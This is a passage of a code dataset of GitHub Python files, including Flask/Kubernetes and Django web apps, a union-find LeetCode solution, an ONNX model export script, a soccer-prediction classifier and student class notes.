400\n}\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'hopwork.pipelines.HopworkPipeline': 300,\n}\n\n# Show skipped requests\nDUPEFILTER_DEBUG = True","repo_name":"lisneifild/hopwork","sub_path":"hopwork/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"36636626297","text":"import json, yaml\nfrom flask import Flask, request\nfrom prometheus_flask_exporter import PrometheusMetrics\nfrom os import path\nimport time\nfrom kubernetes import client, config\n\nconfig.load_kube_config()\napp = Flask(__name__)\nmetrics = PrometheusMetrics(app)\n\n\n@app.route('/regist', methods=['POST'])\ndef robot_registration():\n response = {'success': False}\n\n # parameters = {'name': ''}, request.post\n paramaters = json.loads(request.get_data())\n name = paramaters['name']\n response['success'] = True\n k8s_apps_v1 = client.AppsV1Api()\n\n # statepublisher.yaml\n with open(path.join(path.dirname(__file__), \"rb-function/statepublisher.yaml\")) as file:\n dep = yaml.safe_load(file)\n # paramater change\n dep['spec']['template']['spec']['containers'][0]['env'][1]['value'] ='{}'.format(name)\n dep['metadata']['name'] = 'ros-state-publisher-{}'.format(name.replace('_', '-'))\n resp = k8s_apps_v1.create_namespaced_deployment(body=dep, namespace=\"default\")\n print(\"Deployment created. status='%s'\" % resp.metadata.name)\n\n time.sleep(5)\n\n # Deployment create, rb_name = name\n # slamgmapping.yaml\n with open(path.join(path.dirname(__file__), \"rb-function/slamgmapping.yaml\")) as file:\n dep3 = yaml.safe_load(file)\n # paramater change\n dep3['spec']['template']['spec']['containers'][0]['env'][1]['value'] ='{}'.format(name)\n dep3['metadata']['name'] = 'ros-slam-gmapping-{}'.format(name.replace('_', '-'))\n k8s_apps_v1 = client.AppsV1Api()\n resp = k8s_apps_v1.create_namespaced_deployment(body=dep3, namespace=\"default\")\n print(\"Deployment created. status='%s'\" % resp.metadata.name)\n\n time.sleep(5)\n\n # mapmerge.yaml\n try:\n k8s_apps_v1.delete_namespaced_deployment(name='ros-map-merge', namespace='default')\n except:\n print('map merge is not existe')\n with open(path.join(path.dirname(__file__), \"rb-function/mapmerge.yaml\")) as file:\n dep6 = yaml.safe_load(file)\n # paramater change\n resp = k8s_apps_v1.create_namespaced_deployment(body=dep6, namespace=\"default\")\n print(\"Deployment created. status='%s'\" % resp.metadata.name)\n return response\n\n\n@app.route('/')\ndef get_check():\n return \"checking Running Server\"\n\n\nif __name__=='__main__':\n app.run(host='114.70.21.161', port='8082')\n\n","repo_name":"ChanghyunRyu/R2C-Robot_to_Cloud","sub_path":"cloud_api/regist-api-server.py","file_name":"regist-api-server.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35717547533","text":"from sqlalchemy.orm import Session\n\nimport models, schemas\n\n\n\ndef get_items(db: Session, skip: int = 0, limit: int = 100):\n return db.query(models.Item).offset(skip).limit(limit).all()\n\n\ndef get_item_id(db: Session, item_id: int):\n return db.query(models.Item).filter(models.Item.id == item_id).first()\n\ndef get_item_title(db: Session, title: str):\n return db.query(models.Item).filter(models.Item.title == title).first()\n\n\ndef create_item(db: Session, item: schemas.ItemCreate):\n db_item = models.Item(**item.dict())\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n return db_item\n#crud.mod_item(db, item_id=item_id,item = item\ndef mod_item(db: Session, item: schemas.Item):\n db_item = db.query(models.Item).filter(models.Item.id == item.id).first()\n if not db_item:\n raise HTTPException(status_code=404, detail=\"Item not found\")\n item_data = item.dict(exclude_unset=True)\n for key, value in item_data.items():\n setattr(db_item, key, value)\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n \n return db_item\n\ndef del_item(db: Session, item_id: int):\n db_item =db.query(models.Item).filter(models.Item.id == item_id).first()\n db.delete(db_item)\n db.commit()\n #db.refresh(db_item)\n return db_item \n","repo_name":"Antonioarf/megadados_p1","sub_path":"crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"43754667518","text":"from mtda.console.serial import SerialConsole\nfrom mtda.support.usb import Composite\n\n\nclass UsbFunctionConsole(SerialConsole):\n\n def __init__(self, mtda):\n super().__init__(mtda)\n self.hotplug = True\n self.port = None\n self.rate = 9600\n Composite.mtda = mtda\n\n def configure(self, conf, role='console'):\n self.mtda.debug(3, \"console.usbf.configure()\")\n\n super().configure(conf)\n if self.port is None:\n self.port = \"/dev/ttyGS0\" if role == \"console\" else \"/dev/ttyGS1\"\n result = Composite.configure(role, conf)\n\n self.mtda.debug(3, \"console.usbf.configure(): {}\".format(result))\n return result\n\n def configure_systemd(self, dir):\n return None\n\n\ndef instantiate(mtda):\n return UsbFunctionConsole(mtda)\n","repo_name":"siemens/mtda","sub_path":"mtda/console/usbf.py","file_name":"usbf.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
+{"seq_id":"14198841425","text":"# from pudb import set_trace; set_trace()\nfrom typing import List\nimport math\nfrom collections import defaultdict\n\n\nclass DSU:\n def __init__(self, N: int):\n self.par = list(range(N))\n self.rnk = [0] * N\n # zero must be the ultimate parent, such that whoever unions with zero,\n # its parent will be zero, regardless of when the union happens\n self.rnk[0] = math.inf\n\n def find(self, x: int) -> int:\n if self.par[x] != x:\n self.par[x] = self.find(self.par[x])\n return self.par[x]\n\n def union(self, x: int, y: int) -> bool:\n x_par, y_par = self.find(x), self.find(y)\n if x_par == y_par:\n return False\n if self.rnk[x_par] > self.rnk[y_par]:\n self.par[y_par] = x_par\n elif self.rnk[x_par] < self.rnk[y_par]:\n self.par[x_par] = y_par\n else:\n self.rnk[x_par] += 1\n self.par[y_par] = x_par\n return True\n\n def detach(self, x: int) -> None:\n \"\"\"Detach x from any group it might have been associated with.\"\"\"\n self.par[x] = x\n self.rnk[x] = 0\n\n\nclass Solution:\n def findAllPeople(self, n: int, meetings: List[List[int]], firstPerson: int) -> List[int]:\n \"\"\"This is a good problem. It is apparently union-find, but there are\n two twists.\n\n First, we need to deal with the situation like this\n\n [[3,1,3],[1,2,2],[0,3,3]] with firstPerson = 3\n\n The first meeting is between 1 and 2; neither has secret. The second\n meeting is between 3 and 1, so now 1 has secret. However, the meeting\n between 1 and 2 happens earlier. Thus, 2 still does not have secret,\n despite 1 having secret. If we use a naive union-find, where 1 and 2\n are unioned. Then when 1 and 3 are unioned, 2 would've been unioned\n with 3 as well, making him share secret. We must break such tie. Hence\n during iteration of the meeting (in ascending time order), whenever all\n the meetings of the same time have ended, we check to see if any of the\n people involved does not share secret. For such outsider, we must cut\n its tie to any of the union before.\n\n Second, we want anyone that union with someone else who has zero as\n parent to also have zero as parent. However, since the union is decided\n by the rank of the parent, it is likely the rank of zero is lower than\n the rank of another parent, if the other parent is unioned ahead of\n time. Therefore, we must arbitrarily set the rank of zero maximum,\n thus guaranteeing that whoever unions with some with parent as zero\n also gets zero as parent.\n\n O(MlogM + (M + N)alpha(N)), where M = len(meetings), and alpha(N) is\n the inverse function of Ackermann function, which describes the time\n complexity of union find with path compression.\n\n 5625 ms, faster than 12.50%\n\n Time complexity inspired by: https://leetcode.com/problems/find-all-people-with-secret/discuss/1599815/C%2B%2B-Union-Find\n \"\"\"\n meetings.sort(key=lambda tup: tup[2])\n dsu = DSU(n)\n dsu.union(0, firstPerson)\n pre_t = 0\n outsider = set()\n for x, y, t in meetings:\n if t != pre_t:\n for p in outsider:\n if dsu.find(p) != 0:\n # at the end of a specific time, if a person is not\n # part of the secret, he must be removed of any\n # connection to any other outsider who might become an\n # insider later on. This is to avoid such other outsider\n # becoming an insider pulls the current person into the\n # secret as well\n dsu.detach(p)\n outsider = set()\n dsu.union(x, y)\n pre_t = t\n if dsu.find(x):\n outsider.add(x)\n if dsu.find(y):\n outsider.add(y)\n return [i for i in range(n) if dsu.find(i) == 0]\n\n\nsol = Solution()\ntests = [\n (6, [[1,2,5],[2,3,8],[1,5,10]], 1, [0,1,2,3,5]),\n (4, [[3,1,3],[1,2,2],[0,3,3]], 3, [0,1,3]),\n (5, [[3,4,2],[1,2,1],[2,3,1]], 1, [0,1,2,3,4]),\n (6, [[0,2,1],[1,3,1],[4,5,1]], 1, [0,1,2,3]),\n (6, [[0,2,1],[1,3,1],[4,5,1],[1,4,1]], 1, [0,1,2,3,4,5]),\n (5, [[1,4,3],[0,4,3]], 3, [0,1,3,4]),\n (4, [[1,2,1],[0,3,1],[2,0,1]], 3, [0,1,2,3])\n]\n\nfor i, (n, meetings, firstPerson, ans) in enumerate(tests):\n res = sol.findAllPeople(n, meetings, firstPerson)\n res.sort()\n ans.sort()\n if res == ans:\n print(f'Test {i}: PASS')\n else:\n print(f'Test {i}; Fail. Ans: {ans}, Res: {res}')\n","repo_name":"FanchenBao/leetcode","sub_path":"LeetCode_2092.py","file_name":"LeetCode_2092.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"4748626636","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 27 15:09:30 2015\n\n@author: Pete\n\nThis module is a test processing module for data created with TurbineDAQ.\n\n\"\"\"\n\nfrom __future__ import division, print_function\nimport pandas as pd\n\nprint(\"Imported processing module\")\n\ndef process_run(section, nrun):\n print(\"Processing\", section, \"run\", nrun)\n summary = pd.Series()\n summary[\"mean_cp\"] = 0.3\n return summary\n\ndef process_latest_run(section):\n print(\"Processing latest run of\", section)","repo_name":"petebachant/TurbineDAQ","sub_path":"test/Modules/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"5153067986","text":"class GameTickPacket:\n def __init__(self, bots):\n self.bots = bots\n self.rockets = [rockets()] * len(self.bots)\n self.bounds = bounds()\n self.latest_tick = 0\n self.attributes = [None, None]\n\n def update(self, index):\n self.rockets[index].verticalSpeed.append(self.bots[index].verticalSpeed[0])\n self.rockets[index].horizontalSpeed.append(self.bots[index].horizontalSpeed[0])\n self.rockets[index].x.append(self.bots[index].x)\n self.rockets[index].y.append(self.bots[index].y)\n self.rockets[index].isDead.append(self.bots[index].isDead)\n self.rockets[index].thrust.append(self.bots[index].thrust_power)\n self.attributes[0] = self.bounds.attributes\n self.attributes[1] = self.rockets[index].attributes\n # print(self.attributes)\n self.latest_tick += 1\n\n def reset(self):\n self.__init__(self.bots)\n\n\nclass rockets:\n def __init__(self):\n self.verticalSpeed = []\n self.x = []\n self.y = []\n self.horizontalSpeed = []\n self.thrust = []\n self.isDead = []\n self.attributes = [self.verticalSpeed, self.x, self.y, self.horizontalSpeed, self.thrust, self.isDead]\n\n\nclass bounds:\n def __init__(self):\n self.x = 640\n self.y = 480\n self.attributes = (self.x, self.y)\n","repo_name":"iamPres/self-landing-rockets","sub_path":"GameTickPacket.py","file_name":"GameTickPacket.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7552410951","text":"from libdesklets.controls import Control\nfrom IArrayBuffer import IArrayBuffer\n\n\n#----------------------------------------------------------------------------------#\n#\n# ArrayBuffer Class\n#\n#\nclass ArrayBuffer(Control, IArrayBuffer):\n\n #\n # ArrayBuffer Constructor\n #\n def __init__(self):\n\n self.__buffer = []\n self.__size = 0\n self.__cursor = 0\n self.__window_pos = 0\n self.__window_size = 0\n self.__filltype = None\n\n Control.__init__(self)\n\n\n #\n # Get the current object at cursor position\n #\n def __read(self):\n\n return self.__buffer[self.__window_pos:self.__window_pos + \\\n self.__window_size]\n\n\n #\n # Get the entire buffer\n #\n def __read_all(self):\n\n return self.__buffer\n\n\n #\n # Deletes a single line from the buffer\n #\n def __delete(self, pos):\n\n self.__buffer = [self.__filltype] + self.__buffer[:pos] + \\\n self.__buffer[pos + 1:]\n\n\n #\n # Fill the buffer with an object\n #\n def __fill(self, obj):\n\n for i in range(self.__size):\n self.__buffer[i] = obj\n\n\n #\n # Write object to current cursor position within buffer\n #\n def __write(self, objArr):\n\n n = len(objArr)\n\n if self.__cursor + n > self.__size:\n if n >= self.__size:\n tmp = n - self.__size\n self.__buffer = objArr[tmp:]\n\n else:\n tmp = self.__size - n\n self.__buffer = self.__buffer[self.__cursor - \\\n tmp:self.__cursor]\n self.__buffer += objArr\n\n self.__cursor = self.__size\n\n else:\n self.__buffer[self.__cursor:] = objArr + \\\n self.__buffer[self.__cursor + n:]\n self.__cursor += n\n\n\n #\n # Get the current viewable window position\n #\n def __get_window_pos(self):\n\n return self.__window_pos\n\n\n #\n # Get the filltype\n #\n def __get_filltype(self):\n\n return self.__filltype\n\n\n #\n # Sets the filltype used when resizing the buffer\n #\n def __set_filltype(self, obj):\n\n self.__filltype = obj\n\n\n #\n # Set the viewable window position\n #\n def __set_window_pos(self, pos):\n\n if pos < 0:\n pos = 0\n\n if pos + self.__window_size > self.__size:\n pos = self.__size - self.__window_size\n\n self.__window_pos = pos\n\n\n #\n # Get the size of the viewable window\n #\n def __get_window_size(self):\n\n return self.__window_size\n\n\n #\n # Set the size of the viewable window\n #\n def __set_window_size(self, size):\n\n if size > self.__size:\n size = self.__size\n\n self.__window_size = size\n\n\n #\n # Get the size of the buffer\n #\n def __get_size(self):\n\n return self.__size\n\n\n #\n # Set the size of the buffer\n #\n def __set_size(self, size):\n\n if size > self.__size:\n\n tmp = [ self.__filltype for i in range(size - self.__size) ]\n\n self.__buffer = tmp + self.__buffer\n\n else:\n self.__buffer = self.__buffer[self.__size - size:]\n\n self.__size = size\n\n\n #\n # Get the current buffer cursor position\n #\n def __get_cursor(self):\n\n return self.__cursor\n\n\n #\n # Set the position of the buffer cursor\n #\n def __set_cursor(self, pos):\n\n if pos < 0:\n pos = 0\n\n if pos > self.__size:\n pos = self.__size\n\n self.__cursor = pos\n\n\n #\n # Interface\n #\n read = property(fget = __read,\n doc = \"Return the viewable window array\")\n read_all = property(fget = __read_all,\n doc = \"Return the entire buffer array\")\n delete = property(fset = __delete,\n doc = \"Delete line from buffer\")\n write = property(fset = __write,\n doc = \"Write line at position cursor\")\n fill = property(fset = __fill,\n doc = \"Fill the buffer with an object\")\n filltype = property(fget = __get_filltype, fset = __set_filltype,\n doc = \"Get/Set the empty space fill type\")\n window_pos = property(fget = __get_window_pos, fset = __set_window_pos,\n doc = \"Get/Set viewable window position\")\n window_size = property(fget = __get_window_size, fset = __set_window_size,\n doc = \"Get/Set viewable window size\")\n size = property(fget = __get_size, fset = __set_size,\n doc = \"Get/Set buffer size\")\n cursor = property(fget = __get_cursor, fset = __set_cursor,\n doc = \"Get/Set cursor position\")\n\n\n#----------------------------------------------------------------------------------#\n\ndef get_class(): return ArrayBuffer\n\n","repo_name":"RaumZeit/gdesklets-core","sub_path":"Controls/ArrayBuffer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17285871882","text":"from flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\n\ndb = SQLAlchemy()\n\n\nclass Task(db.Model):\n id = db.Column(db.Integer , primary_key=True)\n name = db.Column(db.String( 250), nullable=False)\n description = db.Column(db.Text)\n created_at = db.Column(db.DateTime)\n completed = db.Column(db.Boolean , default=False)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.created_at = datetime.now() ","repo_name":"Kholoud731/Flask-API","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"2690658187","text":"import pandas as pd\nimport numpy as np\nimport sqlite3 as sql\nfrom sklearn.ensemble import RandomForestClassifier\nfrom pprint import pprint\nimport itertools\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\npd.options.display.expand_frame_repr = False\n\n\ndef plot_confusion_matrix(cm, fig, ax, classes,\n normalize=False,\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n tick_marks = range(len(classes))\n ax.set_xticks(tick_marks)\n ax.set_yticks(tick_marks)\n ax.set_xticklabels(classes)\n ax.set_yticklabels(classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n ax.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n ax.set_ylabel('True label')\n ax.set_xlabel('Predicted label')\n ax.invert_yaxis()\n\nconn = sql.connect('Data/database.sqlite')\n\n# query = 'SELECT * FROM Match INNER JOIN League on League.id = Match.league_id'\n\nquery = 'SELECT * FROM Match WHERE league_id == 1729'\n\n# fields = ['home_team_api_id', 'away_team_api_id', 'date', 'home_team_goal', 'away_team_goal']\n# more_fields = ['goal', 'shoton', 'shotoff', 'possession', 'cross', 'corner', 'foulcommit']\n# odds = ['B365H', 'B365D', 'B365A', 'BWH', 'BWD', 'BWA', 'IWH', 'IWD', 'IWA', 'LBH', 'LBD', 'LBA', 'PSH', 'PSD']\n\ndf = pd.read_sql_query(query, conn, index_col='id')\n\ndf['GD'] = df['home_team_goal'] - df['away_team_goal']\ndf = df.loc[df['GD'] != 0]\ndf['result'] = np.where(df['GD'] > 0, 1, 0)\n\n# CHOOSE FEATURES\n# --------------------------------------------------------------------------------------------------\nFEATURES = ['B365H', 'BWH', 'LBH']\ndf = df.loc[:, ['result'] + FEATURES]\n# --------------------------------------------------------------------------------------------------\n\ndf = df.sample(frac=1) # shuffle\ndf = df.dropna() # drop NaNs\n\nsplit = 0.80\nsplit_idx = int(split * len(df))\ntrain_df = df.iloc[:split_idx, :]\ntest_df = df.iloc[split_idx:, :]\n\n\nX_train = train_df.loc[:, FEATURES]\nT_train = train_df.loc[:, 'result']\n\n\nRF = RandomForestClassifier()\nRF.fit(X_train, T_train)\ntraining_results = RF.predict(X_train)\n\nY = training_results\nT = T_train\ncm = confusion_matrix(y_true=T, y_pred=Y)\nfig, (ax1, ax2) = plt.subplots(1, 2)\nax1.set_title('Train results')\nplot_confusion_matrix(cm, fig, ax1, ['loss', 'win'])\n\n# TEST\nX_test = test_df.loc[:, FEATURES]\nT_test = test_df.loc[:, 'result']\n\ntesting_results = RF.predict(X_test)\n\nY = testing_results\nT = T_test\ncm = confusion_matrix(y_true=T, y_pred=Y)\nplot_confusion_matrix(cm, fig, ax2, ['loss', 'win'])\nax2.set_title('Test results')\nplt.tight_layout()\nplt.show()\n","repo_name":"AvraSaslow/Soccer-Events-Prediction-Model","sub_path":"democlassifier.py","file_name":"democlassifier.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"72844830942","text":"from __future__ import print_function\nimport argparse\nimport torch\n#from utils.nms.py_cpu_nms import py_cpu_nms\nfrom models.faceboxes import FaceBoxes\n\nparser = argparse.ArgumentParser(description='FaceBoxes')\n\nparser.add_argument('-m', '--trained_model', default='weights/FaceBoxesProd.pth',\n type=str, help='Trained state_dict file path to open')\nparser.add_argument('--save_folder', default='onnx/FaceBoxes.onnx', type=str, help='Dir to save results')\nparser.add_argument('--cpu', action=\"store_true\", default=True, help='Use cpu inference')\nparser.add_argument('--dataset', default='PASCAL', type=str, choices=['AFW', 'PASCAL', 'FDDB'], help='dataset')\nparser.add_argument('--confidence_threshold', default=0.05, type=float, help='confidence_threshold')\nparser.add_argument('--top_k', default=5000, type=int, help='top_k')\nparser.add_argument('--nms_threshold', default=0.3, type=float, help='nms_threshold')\nparser.add_argument('--keep_top_k', default=750, type=int, help='keep_top_k')\nparser.add_argument('-s', '--show_image', action=\"store_true\", default=False, help='show detection results')\nparser.add_argument('--vis_thres', default=0.5, type=float, help='visualization_threshold')\nargs = parser.parse_args()\n\n\ndef check_keys(model, pretrained_state_dict):\n ckpt_keys = set(pretrained_state_dict.keys())\n model_keys = set(model.state_dict().keys())\n used_pretrained_keys = model_keys & ckpt_keys\n unused_pretrained_keys = ckpt_keys - model_keys\n missing_keys = model_keys - ckpt_keys\n print('Missing keys:{}'.format(len(missing_keys)))\n print('Unused checkpoint keys:{}'.format(len(unused_pretrained_keys)))\n print('Used keys:{}'.format(len(used_pretrained_keys)))\n assert len(used_pretrained_keys) > 0, 'load NONE from pretrained checkpoint'\n return True\n\n\ndef remove_prefix(state_dict, prefix):\n ''' Old style model is stored with all names of parameters sharing common prefix 'module.' '''\n print('remove prefix \\'{}\\''.format(prefix))\n f = lambda x: x.split(prefix, 1)[-1] if x.startswith(prefix) else x\n return {f(key): value for key, value in state_dict.items()}\n\n\ndef load_model(model, pretrained_path, load_to_cpu):\n print('Loading pretrained model from {}'.format(pretrained_path))\n if load_to_cpu:\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage)\n else:\n device = torch.cuda.current_device()\n pretrained_dict = torch.load(pretrained_path, map_location=lambda storage, loc: storage.cuda(device))\n if \"state_dict\" in pretrained_dict.keys():\n pretrained_dict = remove_prefix(pretrained_dict['state_dict'], 'module.')\n else:\n pretrained_dict = remove_prefix(pretrained_dict, 'module.')\n check_keys(model, pretrained_dict)\n model.load_state_dict(pretrained_dict, strict=False)\n return model\n\n\nif __name__ == '__main__':\n \n torch.set_grad_enabled(False)\n # net and model\n net = FaceBoxes(phase='test', size=None, num_classes=2) # initialize detector\n net = load_model(net, args.trained_model, args.cpu)\n net.eval()\n input_names = [\"image\"]\n output_names = [\"class\",\"loc\"]\n dynamic_axes = {'image': {0: '-1'}, 'class': {0: '-1'}, 'loc': {0: '-1'}}\n dummy_input = torch.randn(1, 3, 1024, 1024)\n torch.onnx.export(net, dummy_input, args.save_folder, input_names = input_names, dynamic_axes = dynamic_axes, output_names = output_names, opset_version=11, verbose=True)\n\n\n\n \n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"ACL_PyTorch/contrib/cv/face/FaceBoxes/faceboxes_pth2onnx.py","file_name":"faceboxes_pth2onnx.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
+{"seq_id":"23758773151","text":"def merge(*args):\n fin = args[0] # на вывод\n my_keys = fin.keys() #мои ключи\n length = len(args)\n for i in range(1, length):\n temp_keys = args[i].keys() #проверк\n for k in temp_keys:\n if k in my_keys:\n if type(fin[k]) is list:\n temp = fin[k]\n else:\n temp = [fin[k]]\n temp.append(args[i][k])\n fin[k] = temp\n my_keys = fin.keys()\n else:\n fin[k] = args[i][k]\n return fin\n\na = {1:2, 3:4}\nb = {1:10, 2:5, 7:10}\nc = {1:7, 2:10}\nprint(merge(a, b, c))","repo_name":"paladinchik56/for-ITIS-by-Grisha","sub_path":"1 curse/test3/deb.py","file_name":"deb.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40635628806","text":"##10072014c.py\r\n##John brook\r\n##class notes from 10-07-2014\r\n\r\n\r\n\r\n##============================================================##\r\n###Base class\r\n##\r\n##class Critter(object):\r\n## \"\"\"A virtual pet\"\"\"\r\n## def talk(self): #class methoid #callable function\r\n## print(\"Hi. I'm an instance of class Critter.\")\r\n##\r\n##def main():\r\n## crit = Critter() #shortens class\r\n## crit.talk() #class w/ fun\r\n##\r\n##main()\r\n\r\n\r\n##============================================================##\r\n\r\n##class Critter(object):\r\n## \"\"\"A virtual pet\"\"\"\r\n## def talk(self): #class methoid #callable function\r\n## print(\"Hi. I'm an instance of class Critter.\")\r\n## def __init__(self, legs, color, toxic, name):\r\n## self.name = name\r\n## self.legs = legs\r\n## self.color = color\r\n## self.toxic = toxic\r\n## def __str__(self):\r\n## rep = \"Critter object\\n\"\r\n## rep += \"name: \" + self.name + \"\\n\"\r\n## rep += \"legs: \" + self.legs + \"\\n\"\r\n## rep += \"color: \" + self.color + \"\\n\"\r\n## rep += \"toxic: \" + self.toxic + \"\\n\"\r\n## return rep\r\n##\r\n##\r\n##def main():\r\n## crit = Critter(\"6\",\"blue\",\"yes\",\"frank\") #shortens class\r\n## crit.talk() #class w/ fun\r\n## print(crit)\r\n##\r\n## crit1 = Critter(\"6\",\"purple\",\"no\",\"bob\") #shortens class\r\n## crit.talk() #class w/ fun\r\n## print(crit1)\r\n##\r\n##main()\r\n##============================================================##\r\n\r\nclass playerClass(object):\r\n \"\"\"A virtual pet\"\"\"\r\n def talk(self): #class methoid #callable function\r\n print(\"Hi. I'm an instance of class Critter.\")\r\n def __init__(self,name, HP, MP, ATK, DEF):\r\n self.name = name\r\n self.HP = HP\r\n self.MP = MP\r\n self.ATK = ATK\r\n self.DEF = DEF\r\n \r\n def __str__(self):\r\n rep = \"Critter object\\n\"\r\n rep += \"Name: \" + self.name + \"\\n\"\r\n rep += \"HP: \" + self.HP + \"\\n\"\r\n rep += \"MP: \" + self.MP + \"\\n\"\r\n rep += \"ATK: \" + self.ATK + \"\\n\"\r\n rep += \"DEF: \" + self.DEF + \"\\n\"\r\n return rep\r\n def update_health(self, delta):\r\n self.health = delta\r\n\r\n\r\ndef main():\r\n crit = playerClass(\"bob\",\"6\",\"21\",\"22\",\"22\") #shortens class\r\n crit.talk() #class w/ fun\r\n crit.update_health(\"+5\")\r\n print(crit)\r\n\r\n\r\n\r\nmain()\r\n##============================================================##\r\n","repo_name":"ChocolaKuma/MCC_Learning_Python","sub_path":"10072014c.py","file_name":"10072014c.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7681407057","text":"\"\"\"RegEx finditer function\"\"\"\n\n\nimport re\nimport requests\n\n\n# re.finditer(pattern, string, flags=0)\nhtml = requests.get(\"https://docs.python.org/2/library/re.html\").text\npattern = r\"\\b(the\\s+\\w+)\\s+\"\nregex = re.compile(pattern, re.IGNORECASE)\nfor match in regex.finditer(html):\n print(f\"{match.start()}: {match.group(1)}\")\n","repo_name":"Maulik5041/Everyday-coding","sub_path":"Regex/finditer.py","file_name":"finditer.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1738516638","text":"from django.shortcuts import render\nfrom .models import Annonce\nfrom .forms import Form_Annonce, Form_Add\nfrom django.db.models import Avg\nimport requests\nimport json\n\n# Create your views here.\n\ndef accueil(request):\n ann_form = Form_Annonce()\n add_form = Form_Add()\n\n result_moy, quartile10, quartile90, err = None, None, None, None\n message = None\n\n if request.method == \"POST\":\n form_a = Form_Annonce(request.POST)\n form_l = Form_Add(request.POST)\n if form_a.is_valid():\n data = form_a.cleaned_data\n if data['code_ville']:\n result_moy = Annonce.objects.filter(code_ville = data['code_ville']).aggregate(moyenne = Avg('prix'))['moyenne']\n liste_prix = Annonce.objects.filter(code_ville = data['code_ville']).order_by('prix').values_list('prix', flat=True)\n if len(liste_prix) != 0:\n quartile10 = liste_prix[len(liste_prix) // 10]\n quartile90 = liste_prix[len(liste_prix) * 9 // 10]\n else: err = True\n elif data['ville']:\n data['ville'] = data['ville'].lower()\n result_moy = Annonce.objects.filter(ville = data['ville']).aggregate(moyenne = Avg('prix'))['moyenne']\n liste_prix = Annonce.objects.filter(ville = data['ville']).order_by('prix').values_list('prix', flat=True)\n if len(liste_prix) != 0:\n quartile10 = liste_prix[len(liste_prix) // 10]\n quartile90 = liste_prix[len(liste_prix) * 9 // 10]\n else: err = True\n elif data['departement']:\n result_moy = Annonce.objects.filter(departement = data['departement']).aggregate(moyenne = Avg('prix'))['moyenne']\n liste_prix = Annonce.objects.filter(departement = data['departement']).order_by('prix').values_list('prix', flat=True)\n if len(liste_prix) != 0:\n quartile10 = liste_prix[len(liste_prix) // 10]\n quartile90 = liste_prix[len(liste_prix) * 9 // 10]\n else: err = True\n if result_moy: result_moy = int(result_moy)\n if form_l.is_valid():\n # Find the id, ask API and return useful data\n lien = str(form_l.cleaned_data['lien'])\n \n id_bien = lien[lien.find(\"/ag\") + 3: lien.find(\"?q\")]\n\n url = \"https://www.bienici.com/realEstateAd.json?id=ag\" + str(id_bien)\n response = requests.get(url)\n if response.ok:\n json_data = json.loads(response.content)\n code_postal, ville, prix = json_data['postalCode'], json_data['city'], json_data['priceWithoutFees']\n try:\n annonce = Annonce(prix = prix, departement = code_postal[:-3], ville = ville, code_ville = code_postal)\n annonce.save()\n message = \"L'annonce \" + id_bien + \" a bien été enregistrée dans la base de données\"\n except:\n message = \"Erreur lors de l'ajout de l'annonce\"\n pass\n\n return render(request, \"app_data/home.html\", context={\"ann_form\": ann_form, \"add_form\": add_form, \"result_moy\": result_moy, \"quartile10\": quartile10, \"quartile90\": quartile90, \"err\": err, \"message\": message})\n \n","repo_name":"maelc49/test_technique","sub_path":"1_Dev/exercice_dev/app_data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
